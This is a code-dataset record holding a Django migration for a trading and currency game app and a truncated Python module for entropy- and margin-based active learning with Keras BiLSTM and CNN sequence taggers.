hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c5cf54b8bda6147f293a44fdca91bd99c874cc46 | 3,374 | py | Python | django/currencies/migrations/0002_initial.py | AngelOnFira/megagame-controller | 033fec84babf80ffd0868a0f7d946ac4c18b061c | [
"MIT"
] | null | null | null | django/currencies/migrations/0002_initial.py | AngelOnFira/megagame-controller | 033fec84babf80ffd0868a0f7d946ac4c18b061c | [
"MIT"
] | 1 | 2022-03-03T21:56:12.000Z | 2022-03-03T21:56:12.000Z | django/currencies/migrations/0002_initial.py | AngelOnFira/megagame-controller | 033fec84babf80ffd0868a0f7d946ac4c18b061c | [
"MIT"
] | null | null | null | # Generated by Django 3.2.8 on 2021-11-20 23:06
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
("teams", "0001_initial"),
("players", "0001_initial"),
("discord_models", "0001_initial"),
("currencies", "0001_initial"),
]
operations = [
migrations.AddField(
model_name="transaction",
name="initiating_player",
field=models.ForeignKey(
blank=True,
default=None,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="transaction",
to="players.player",
),
),
migrations.AddField(
model_name="transaction",
name="to_wallet",
field=models.ForeignKey(
blank=True,
default=None,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="debits",
to="currencies.wallet",
),
),
migrations.AddField(
model_name="trade",
name="discord_guild",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
to="discord_models.guild",
),
),
migrations.AddField(
model_name="trade",
name="initiating_party",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="initiated_trades",
to="teams.team",
),
),
migrations.AddField(
model_name="trade",
name="initiating_party_discord_trade_thread",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="initiating_discord_trade_thread",
to="discord_models.channel",
),
),
migrations.AddField(
model_name="trade",
name="receiving_party",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="receiving_trades",
to="teams.team",
),
),
migrations.AddField(
model_name="trade",
name="receiving_party_discord_trade_thread",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="receiving_discord_trade_thread",
to="discord_models.channel",
),
),
migrations.AddField(
model_name="trade",
name="transactions",
field=models.ManyToManyField(to="currencies.Transaction"),
),
migrations.AddField(
model_name="payment",
name="transactions",
field=models.ManyToManyField(to="currencies.Transaction"),
),
]
| 31.240741 | 70 | 0.508595 | 284 | 3,374 | 5.862676 | 0.207746 | 0.043243 | 0.124324 | 0.145946 | 0.75976 | 0.75976 | 0.687688 | 0.687688 | 0.567568 | 0.567568 | 0 | 0.015019 | 0.388263 | 3,374 | 107 | 71 | 31.53271 | 0.791667 | 0.013337 | 0 | 0.71 | 1 | 0 | 0.174031 | 0.066727 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.02 | 0 | 0.06 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
c5e3cb7db018a404603f3f76dc6f607c3dc8a323 | 47,691 | py | Python | code/active.py | tarmeens/active-deep-parsing | 77a511e2b3f5f74cb911061797b020bd5c846570 | [
"MIT"
] | 2 | 2018-06-20T16:10:52.000Z | 2018-07-16T21:03:47.000Z | code/active.py | tarmeens/active-deep-parsing | 77a511e2b3f5f74cb911061797b020bd5c846570 | [
"MIT"
] | null | null | null | code/active.py | tarmeens/active-deep-parsing | 77a511e2b3f5f74cb911061797b020bd5c846570 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
DHLAB - IC - EPFL
This file contains functions for uncertainty sampling active learning.
Important note for fist-time users: this file is an extension of models.py and utils.py. Please check them out first!
author: Mattia Martinelli
date: 08/06/2018
"""
# Modules
import os
import random
import numpy as np
import tensorflow
# Keras function
from keras.callbacks import EarlyStopping
from keras.layers import Embedding, LSTM, Dense, Bidirectional, Dropout, Input, TimeDistributed, Flatten, Convolution1D, MaxPooling1D, concatenate
from keras.models import Sequential, Model
from keras.optimizers import Adam, RMSprop
from keras_contrib.utils import save_load_utils
from models import *
from utils import *
from scipy.stats import rankdata
import scipy as sc
from shutil import copyfile
import operator
from collections import defaultdict
import time
def BiLSTM_score(filename, X_w, X_i, y, word2ind, maxWords, ind2label,
word_embeddings=True, pretrained_embedding="", word_embedding_size=100,
maxChar=0, char_embedding_type="", char2ind="", char_embedding_size=50,
lstm_hidden=32, dropout=0.5, optimizer='rmsprop',
train = False, X_train = None, y_train = None, X_test = None, y_test = None,
nbr_epochs = 1, batch_size=128, early_stopping_patience=-1,
folder_path="BiLSTM_results", score_name = "uncertainty_scores", print_to_file = True
):
"""
The function computes, for each input token, three uncertainty sampling scores: probability, margin, entropy.
Scores are generated with the BiLSTM model. Softmax is the prediction function.
Detailed information about how scores are computed can be found in the report.
The underlying model can be trained. Otherwise it uses the weights in "folder_path/filename/filename.h5".
The result is stored in a csv file, structured with the following columns:
"Sequence", "Position", "Token", "Target", "Predicted", "Posterior", "Confidence", "Margin", "Entropy", "Reference"
where:
- Sequence is the reference index in the dataset (0 first reference, 1 second reference, ...)
- Position is the index of the token in the reference, i.e. the index in the reference (0 first token, 1 second token, ...)
- Token is the token.
- Target is the real label of the token.
- Predicted is the actual prediction on the token.
- Posterior is the output probability of prediction.
- Confidence is the confidence (i.e. posterior) ranking over all tokens.
- Margin is the margin raking over all tokens.
- Entropy is the entropy ranking over all tokens.
- Reference is the full reference to which the token belongs as a string.
Example:
"Sequence", "Position", "Token", "Target", "Predicted", "Posterior", "Confidence", "Margin", "Entropy", "Reference"
4 0 Maria Author Author 99.4 10 9 11 "Maria and ..."
:param filename: File to redirect the printing.
:param X_w: Data to score, given in the original word format of load_data function (in utils.py).
:param X_i: Data to score, given in the indexed format of encodePadData_x function (in utils.py).
:param y: Labels of the data to score, given in the original word format of load_data function (in utils.py).
:param folder_path: Path to the directory storing all to-be-generated files and folders.
:param print_to_file: if True redirects the printings to a file (given in filename), if False std_out is kept
:param score_name: Name of the file with the scores.
:see Please for the other parameters refer to BiLSTM_model function in models.py (identical parameters are named the same).
:return void
"""
# Where model weights will be stored
filepath = folder_path+"/"+filename+"/"+filename
best_model_weights_path = "{0}.h5".format(filepath)
# Get compiled model with input parameters, if needed it can be trained too
model = BiLSTM_model( filename = filename, train = train, output = "softmax",
X_train = X_train, X_test= X_test, word2ind = word2ind, maxWords = maxWords,
y_train = y_train, y_test = y_test, ind2label = ind2label,
validation = False, X_valid = None, y_valid = None,
word_embeddings = word_embeddings, pretrained_embedding = pretrained_embedding, word_embedding_size = word_embedding_size,
maxChar = maxChar, char_embedding_type = char_embedding_type, char2ind = char2ind, char_embedding_size = char_embedding_size,
lstm_hidden = lstm_hidden, batch_size = batch_size, dropout = dropout, optimizer = optimizer,
nbr_epochs = nbr_epochs, early_stopping_patience = early_stopping_patience,
folder_path = folder_path, gen_confusion_matrix = False, return_model = True, print_to_file = print_to_file
)
# HACK: optmizer weight length issue
# https://github.com/keras-team/keras/issues/4044
import h5py
with h5py.File(best_model_weights_path, 'a') as f:
if 'optimizer_weights' in f.keys():
del f['optimizer_weights']
save_load_utils.load_all_weights(model, best_model_weights_path)
# Compute predictions and uncertainty scores
probs = model.predict(X_i)
probs = np.asarray(probs)
# Arguments of sorted values in ascending order
pred_sort_index = np.argsort(probs)
# Reverse the one-hot encoding
#true_index = np.argsort(y_target)[:,:,-1]
true_index = np.argmax(y, axis=-1)
# Predict probability of best prediction
pred_index = pred_sort_index[:,:,-1]
grid = np.indices((pred_index.shape[0], pred_index.shape[1]))
pred_prob = probs[grid[0],grid[1],pred_index[grid[0],grid[1]]]
# Predict probability of second best prediction
pred_2_index = pred_sort_index[:,:,-2]
grid = np.indices((pred_2_index.shape[0], pred_2_index.shape[1]))
pred_2_prob = probs[grid[0],grid[1],pred_2_index[grid[0],grid[1]]]
# Margin score, computed as the difference between the best prediction
# and the second best prediction
pred_margin = pred_prob - pred_2_prob
# Entropy score, compute as entropy over all prediction probabilities ù
# The entropy score is inversed to compute rank later
pred_entropy = np.sum(np.multiply(probs,np.log(probs)), axis = -1)
# Index 0 in the predictions referes to padding
ind2labelNew = ind2label[0].copy()
ind2labelNew.update({0: "null"})
# Compute the labels for each prediction
pred_label = [[ind2labelNew[x] for x in a] for a in pred_index]
true_label = [[ind2labelNew[x] for x in b] for b in true_index]
# Flatten to uniform with ranking
pred_flat = np.ravel(pred_label)
true_flat = np.ravel(true_label)
prob_flat = np.ravel(pred_prob)
# Compute ranking
prob_rank = rankdata(pred_prob, method='min')
margin_rank = rankdata(pred_margin, method='min')
entropy_rank = rankdata(pred_entropy, method='min')
# Fill CSV rows
rows = []
seq_len = maxWords
for i, seq in enumerate(X_w):
# skip first sequence
if i == 0:
continue
seq_offset = i*maxWords + seq_len - len(seq)
for j,w in enumerate(seq):
index = seq_offset + j
rows.append(
(i, j + 1, w, true_flat[index], pred_flat[index],
round(prob_flat[index], 4), prob_rank[index],
margin_rank[index], entropy_rank[index],
" ".join(str(s) for s in seq))
)
# Write results on CSV file
columns = ("Sequence", "Position", "Token", "Target", "Predicted", "Posterior",
"Confidence", "Margin", "Entropy", "Reference")
# Store scores
filename="score"
os.makedirs(folder_path+"/"+filename, exist_ok=True)
score_result_path = folder_path+"/"+filename+"/"+score_name
write_to_csv(score_result_path, columns, rows)
print("BiLSTM score has terminated!")
def CNN_score(filename, X_w, X_i, y, word2ind, maxWords, ind2label, maxChar, char2ind,
pretrained_embedding="", word_embedding_size=100,
char_embedding_size=50, lstm_hidden=32, dropout=0.5, optimizer='rmsprop',
folder_path="CNN_results", score_name = "scores", print_to_file = True,
train = False, X_train = None, y_train = None, X_test = None, y_test = None,
nbr_epochs = 5, batch_size=128, early_stopping_patience=-1):
"""
The function computes, for each input token, three uncertainty sampling scores: probability, margin, entropy.
Scores are generated with the CNN-CNN-LSTM model.
Detailed information about how scores are computed can be found in the report.
The underlying model can be trained. Otherwise it uses the weights in "folder_path/filename/filename.h5".
The result is stored in a csv file. For additional information on the output file, please refer to the BiLSTM_score function description.
:param filename: File to redirect the printing.
:param X_w: Data to score, given in the original word format of load_data function (in utils.py).
:param X_i: Data to score, given in the indexed format of encodePadData_x function (in utils.py).
:param y: Labels of the data to score, given in the original word format of load_data function (in utils.py).
:param folder_path: Path to the directory storing all to-be-generated files and folders.
:param score_name: Name of the file with the scores.
:param print_to_file: if True redirects the printings to a file (given in filename), if False std_out is kept
:see Please for the other parameters refer to BiLSTM_model function in models.py (identical parameters are named the same).
:return void
"""
# Where model weights will be stored
filepath = folder_path+"/"+filename+"/"+filename
best_model_weights_path = "{0}.h5".format(filepath)
# Get compiled model with input parameters, if needed it can be trained too
model = CNN_model(filename = filename, train = train,
X_train = X_train, X_test = X_test, y_train = y_train, y_test = y_test,
word2ind = word2ind, maxWords = maxWords, ind2label = ind2label, maxChar = maxChar, char2ind = char2ind,
validation=False, X_valid=None, y_valid=None,
pretrained_embedding = pretrained_embedding, word_embedding_size = word_embedding_size, char_embedding_size = char_embedding_size,
lstm_hidden = lstm_hidden, nbr_epochs = nbr_epochs, batch_size = batch_size, dropout = dropout,
optimizer= optimizer, early_stopping_patience=-1,
folder_path=folder_path, gen_confusion_matrix=False, return_model = True, print_to_file = print_to_file
)
# HACK: optmizer weight length issue
# https://github.com/keras-team/keras/issues/4044
import h5py
with h5py.File(best_model_weights_path, 'a') as f:
if 'optimizer_weights' in f.keys():
del f['optimizer_weights']
save_load_utils.load_all_weights(model, best_model_weights_path)
# Compute predictions and uncertainty scores
probs = model.predict(X_i)
probs = np.asarray(probs)
# Arguments of sorted values in ascending order
pred_sort_index = np.argsort(probs)
# Reverse the one-hot encoding
#true_index = np.argsort(y_target)[:,:,-1]
true_index = np.argmax(y, axis=-1)
# Predict probability of best prediction
pred_index = pred_sort_index[:,:,-1]
grid = np.indices((pred_index.shape[0], pred_index.shape[1]))
pred_prob = probs[grid[0],grid[1],pred_index[grid[0],grid[1]]]
# Predict probability of second best prediction
pred_2_index = pred_sort_index[:,:,-2]
grid = np.indices((pred_2_index.shape[0], pred_2_index.shape[1]))
pred_2_prob = probs[grid[0],grid[1],pred_2_index[grid[0],grid[1]]]
# Margin score, computed as the difference between the best prediction
# and the second best prediction
pred_margin = pred_prob - pred_2_prob
# Entropy score, compute as entropy over all prediction probabilities ù
# The entropy score is inversed to compute rank later
pred_entropy = np.sum(np.multiply(probs,np.log(probs)), axis = -1)
# Index 0 in the predictions referes to padding
ind2labelNew = ind2label[0].copy()
ind2labelNew.update({0: "null"})
# Compute the labels for each prediction
pred_label = [[ind2labelNew[x] for x in a] for a in pred_index]
true_label = [[ind2labelNew[x] for x in b] for b in true_index]
# Flatten to uniform with ranking
pred_flat = np.ravel(pred_label)
true_flat = np.ravel(true_label)
prob_flat = np.ravel(pred_prob)
# Compute ranking
prob_rank = rankdata(pred_prob, method='min')
margin_rank = rankdata(pred_margin, method='min')
entropy_rank = rankdata(pred_entropy, method='min')
# Create CSV rows
rows = []
seq_len = maxWords
for i, seq in enumerate(X_w):
# skip first sequence
if i == 0:
continue
seq_offset = i*maxWords + seq_len - len(seq)
for j,w in enumerate(seq):
index = seq_offset + j
rows.append(
(i, j + 1, w, true_flat[index], pred_flat[index],
round(prob_flat[index], 4), prob_rank[index],
margin_rank[index], entropy_rank[index],
" ".join(str(s) for s in seq))
)
# Write results on CSV file
columns = ("Sequence", "Position", "Token", "Target", "Predicted", "Posterior",
"Confidence", "Margin", "Entropy", "Reference")
# Store scores
filename="score"
os.makedirs(folder_path+"/"+filename, exist_ok=True)
score_result_path = folder_path+"/"+filename+"/"+score_name
write_to_csv(score_result_path, columns, rows)
print("CNN score has terminated!")
def BiLSTM_query(filename, X_w, X_i, y, numSeqToQuery, mode, word2ind, maxWords, ind2label, query_seed = 42,
write_to_disk = False, verbose= False, task = 1,
word_embeddings=True, pretrained_embedding="", word_embedding_size=100,
maxChar=0, char_embedding_type="", char2ind="", char_embedding_size=50,
lstm_hidden=32, dropout=0.5, optimizer='rmsprop',
train = False, X_train = None, y_train = None, X_test = None, y_test = None,
nbr_epochs = 1, batch_size=128, early_stopping_patience=-1,
folder_path="BiLSTM_results", print_to_file = True
):
"""
The function selects references from the dataset according to their entropy uncertainy sampling score.
Scores are generated with the BiLSTM model. Softmax is the prediction function.
Detailed information about how sequence scores are computed can be found in the report.
The underlying can be trained. Otherwise it uses the weights in "folder_path/filename/filename.h5".
:param filename: File to redirect the printing.
:param X_w: Data to score, given in the original word format of load_data function (in utils.py).
:param X_i: Data to score, given in the indexed format of encodePadData_x function (in utils.py).
:param y: Labels of the data to score, given in the original word format of load_data function (in utils.py).
:param numSeqToQuery: Number of references to query.
:param mode: How references are queried:
- least: query least confident references, i.e. highest entropy.
- most: query most confident references, i.e. lowest entropy.
- random: query references randomly.
:param query_seed: seed of the random sampling.
:param write_to_disk: if True, stores in a text file the queried references.
:param verbose: if True, and write_to_disk is True, store entropy scores and target label along with the tokens.
:param task: for which task the function is querying. Effective only if write_to_disk is True. Must be a value between 1 and 3.
:param folder_path: Path to the directory storing all to-be-generated files and folders.
:param print_to_file: if True redirects the printings to a file (given in filename), if False std_out is kept
:see Please for the other parameters refer to BiLSTM_model function in models.py (identical parameters are named the same).
:return Indices of the queried references.
"""
assert(task >= 1 and task <= 3)
# Where model weights will be stored
filepath = folder_path+"/"+filename+"/"+filename
best_model_weights_path = "{0}.h5".format(filepath)
# Get compiled model with input parameters, if needed it can be trained too
model = BiLSTM_model( filename = filename, train = train, output = "softmax",
X_train = X_train, X_test= X_test, word2ind = word2ind, maxWords = maxWords,
y_train = y_train, y_test = y_test, ind2label = ind2label,
validation = False, X_valid = None, y_valid = None,
word_embeddings = word_embeddings, pretrained_embedding = pretrained_embedding, word_embedding_size = word_embedding_size,
maxChar = maxChar, char_embedding_type = char_embedding_type, char2ind = char2ind, char_embedding_size = char_embedding_size,
lstm_hidden = lstm_hidden, batch_size = batch_size, dropout = dropout, optimizer = optimizer,
nbr_epochs = nbr_epochs, early_stopping_patience = early_stopping_patience,
folder_path = folder_path, gen_confusion_matrix = False, return_model = True, print_to_file = print_to_file
)
# HACK: optmizer weight length issue
# https://github.com/keras-team/keras/issues/4044
import h5py
with h5py.File(best_model_weights_path, 'a') as f:
if 'optimizer_weights' in f.keys():
del f['optimizer_weights']
save_load_utils.load_all_weights(model, best_model_weights_path)
# Compute predictions and uncertainty scores
probs = model.predict(X_i)
probs = np.asarray(probs)
# Arguments of sorted values in ascending order
pred_sort_index = np.argsort(probs)
# Reverse the one-hot encoding
#true_index = np.argsort(y_target)[:,:,-1]
true_index = np.argmax(y, axis=-1)
# Predict probability of best prediction
pred_index = pred_sort_index[:,:,-1]
grid = np.indices((pred_index.shape[0], pred_index.shape[1]))
pred_prob = probs[grid[0],grid[1],pred_index[grid[0],grid[1]]]
# Entropy score, compute as entropy over all prediction probabilities
# The entropy score is inversed to later sort the list in ascending order
pred_entropy = np.sum(np.multiply(probs,np.log(probs)), axis = -1)
# Entropy over the sequence (with no padding)
# The value is computed as the average entropy w.r.t. the tokens which are not padding
sequence_len = np.count_nonzero((X_i[0] != 0), -1)
sequence_entropy = np.divide((pred_entropy * (X_i[0] != 0)).sum(axis = -1)[1:], sequence_len[1:])
# Get indices of sorted array
sequence_entropy_sort_index = np.argsort(sequence_entropy)
# Add 1 to indices to take first line into account
add1 = np.vectorize(lambda x: x + 1)
sequence_entropy_sort_index = add1(sequence_entropy_sort_index)
# Entropy over the sequence (with padding)
# The value is computed as the sum of entropies of all tokens in the sequence
#sequence_entropy = np.sum(pred_entropy, axis = -1)
#sequence_entropy_sort_index = np.argsort(sequence_entropy)
# Index 0 in the predictions referes to padding
ind2labelNew = ind2label[0].copy()
ind2labelNew.update({0: "null"})
# Compute the labels for each prediction
pred_label = [[ind2labelNew[x] for x in a] for a in pred_index]
true_label = [[ind2labelNew[x] for x in b] for b in true_index]
# Flatten to uniform indexing
pred_flat = np.ravel(pred_label)
true_flat = np.ravel(true_label)
entropy_flat = np.ravel(pred_entropy)
seq_len = maxWords
value_to_return = None
# Get least confident (highest entropy)
if mode == "least":
query_index_least_rank = sequence_entropy_sort_index[:numSeqToQuery]
value_to_return = query_index_least_rank
filename="least.txt"
# Get most confident (lowest entropy)
if mode == "most":
query_index_most_rank = sequence_entropy_sort_index[max((len(sequence_entropy_sort_index) - numSeqToQuery),0):]
value_to_return = query_index_most_rank
filename="most.txt"
# Get random sequences
if mode == "random":
# Compute random indexing
query_index_random = np.arange(1, len(sequence_entropy_sort_index) + 1)
np.random.seed(query_seed)
np.random.shuffle(query_index_random)
query_index_random = query_index_random[:numSeqToQuery]
value_to_return = query_index_random
filename="random.txt"
# NOTE: other uncertainty sampling measures can be inserted below.
# Store sequences in a file
if write_to_disk:
os.makedirs(folder_path+"/"+"query_result", exist_ok=True)
query_result_path = folder_path+"/"+"query_result"+"/"+filename
with open(query_result_path, "w", encoding = "utf-8") as f:
if verbose:
f.write("token target predicted entropy\r\r")
else:
f.write("-DOCSTART- -X- -X- o\r\r")
# Store least index rank
for i in value_to_return:
seq = X_w[i]
seq_offset = i*maxWords + seq_len - len(seq)
for j,w in enumerate(seq):
index = seq_offset + j
if verbose:
f.write(w + " " + true_flat[index] + " " + pred_flat[index] + " " + str(entropy_flat[index]) + "\r")
else:
if task == 1:
f.write(w + " " + true_flat[index] + " o o\r")
elif task == 2:
f.write(w + " o " + true_flat[index] + " o\r")
elif task == 3:
f.write(w + " o o " + true_flat[index] + "\r")
else:
raise Exception('Bad task given.')
f.write("\r")
print("BiLSTM query has terminated!")
return value_to_return
def CNN_query(filename, X_w, X_i, y, numSeqToQuery, mode, word2ind, maxWords, ind2label, maxChar, char2ind, seed = 42,
write_to_disk = False, verbose = False, task = 1,
pretrained_embedding="", word_embedding_size=100, char_embedding_size=50,
lstm_hidden=32, dropout=0.5, optimizer='rmsprop',
train = False, X_train = None, y_train = None, X_test = None, y_test = None,
nbr_epochs = 5, batch_size=128, early_stopping_patience=-1, folder_path="CNN_results", print_to_file = True
):
"""
The function selects references from the dataset according to their entropy uncertainy sampling score.
Scores are generated with the CNN-CNN-LSTM model.
Detailed information on how sequence scores are computed can be found in the report.
The underlying model can be trained. Otherwise it uses the weights in "folder_path/filename/filename.h5".
:param filename: File to redirect the printing.
:param X_w: Data to score, given in the original word format of load_data function (in utils.py).
:param X_i: Data to score, given in the indexed format of encodePadData_x function (in utils.py).
:param y: Labels of the data to score, given in the original word format of load_data function (in utils.py).
:param numSeqToQuery: Number of references to query.
:param mode: How references are queried:
- least: query least confident references, i.e. highest entropy.
- most: query most confident references, i.e. lowest entropy.
- random: query references randomly.
- hybrid: hybrid least/most approach.
- Other methods can be added if needed.
:param query_seed: seed of the random sampling.
:param write_to_disk: if True, stores in a text file the queried references.
:param verbose: if True, and write_to_disk is True, store entropy scores and target label along with the tokens.
:param task: for which task the function is querying. Effective only if write_to_disk is True. Must be a value between 1 and 3.
:param folder_path: Path to the directory storing all to-be-generated files and folders.
:param print_to_file: if True redirects the printings to a file (given in filename), if False std_out is kept
:see Please for the other parameters refer to BiLSTM_model function in models.py (identical parameters are named the same).
:return indices of the queried references.
"""
# Where model weights will be stored
filepath = folder_path+"/"+filename+"/"+filename
best_model_weights_path = "{0}.h5".format(filepath)
# Get compiled model with input parameters, if needed it can be trained too
model = CNN_model(filename = filename, train = train,
X_train = X_train, X_test = X_test, y_train = y_train, y_test = y_test,
word2ind = word2ind, maxWords = maxWords, ind2label = ind2label, maxChar = maxChar, char2ind = char2ind,
validation=False, X_valid=None, y_valid=None,
pretrained_embedding = pretrained_embedding, word_embedding_size = word_embedding_size, char_embedding_size = char_embedding_size,
lstm_hidden = lstm_hidden, nbr_epochs = nbr_epochs, batch_size = batch_size, dropout = dropout,
optimizer= optimizer, early_stopping_patience=-1,
folder_path=folder_path, gen_confusion_matrix=False, return_model = True, print_to_file = print_to_file
)
# HACK: optmizer weight length issue
# https://github.com/keras-team/keras/issues/4044
import h5py
with h5py.File(best_model_weights_path, 'a') as f:
if 'optimizer_weights' in f.keys():
del f['optimizer_weights']
save_load_utils.load_all_weights(model, best_model_weights_path)
# Compute predictions and uncertainty scores
probs = model.predict(X_i)
probs = np.asarray(probs)
# Arguments of sorted values in ascending order
pred_sort_index = np.argsort(probs)
# Reverse the one-hot encoding
#true_index = np.argsort(y_target)[:,:,-1]
true_index = np.argmax(y, axis=-1)
# Predict probability of best prediction
pred_index = pred_sort_index[:,:,-1]
grid = np.indices((pred_index.shape[0], pred_index.shape[1]))
pred_prob = probs[grid[0],grid[1],pred_index[grid[0],grid[1]]]
# Entropy score, compute as entropy over all prediction probabilities
# The entropy score is inversed to sort the list later in ascending order
pred_entropy = np.sum(np.multiply(probs,np.log(probs)), axis = -1)
# Entropy over the sequence (with no padding)
# The value is computed as the average entropy w.r.t. the tokens which are not padding
sequence_len = np.count_nonzero((X_i[0] != 0), -1)
sequence_entropy = np.divide((pred_entropy * (X_i[0] != 0)).sum(axis = -1)[1:], sequence_len[1:]) # [1:] because first sequence is empty line
# Get indices of sorted array
sequence_entropy_sort_index = np.argsort(sequence_entropy)
# Add 1 to indices to take first line into account
add1 = np.vectorize(lambda x: x + 1)
sequence_entropy_sort_index = add1(sequence_entropy_sort_index)
# Entropy over the sequence (with padding)
# The value is computed as the sum of entropies of all tokens in the sequence
#sequence_entropy = np.sum(pred_entropy, axis = -1)
#sequence_entropy_sort_index = np.argsort(sequence_entropy)
# Index 0 in the predictions referes to padding
ind2labelNew = ind2label[0].copy()
ind2labelNew.update({0: "null"})
# Compute the labels for each prediction
pred_label = [[ind2labelNew[x] for x in a] for a in pred_index]
true_label = [[ind2labelNew[x] for x in b] for b in true_index]
# Flatten to uniform indexing
pred_flat = np.ravel(pred_label)
true_flat = np.ravel(true_label)
entropy_flat = np.ravel(pred_entropy)
seq_len = maxWords
if write_to_disk:
os.makedirs(folder_path+"/"+"query_result", exist_ok=True)
value_to_return = None
# Get least confident index rank
if mode == "least":
# Compute lowest rank indexing
query_index_least_rank = sequence_entropy_sort_index[:numSeqToQuery]
value_to_return = query_index_least_rank
filename="least.txt"
# Get most confident index rank
if mode == "most":
# Compute lowest and highest rank indexing
query_index_most_rank = sequence_entropy_sort_index[max((len(sequence_entropy_sort_index) - numSeqToQuery),0):]
value_to_return = query_index_most_rank
filename="most.txt"
# Get random index
if mode == "random":
# Compute random indexing
query_index_random = np.arange(1, len(sequence_entropy_sort_index) + 1)
np.random.seed(seed)
np.random.shuffle(query_index_random)
query_index_random = query_index_random[:numSeqToQuery]
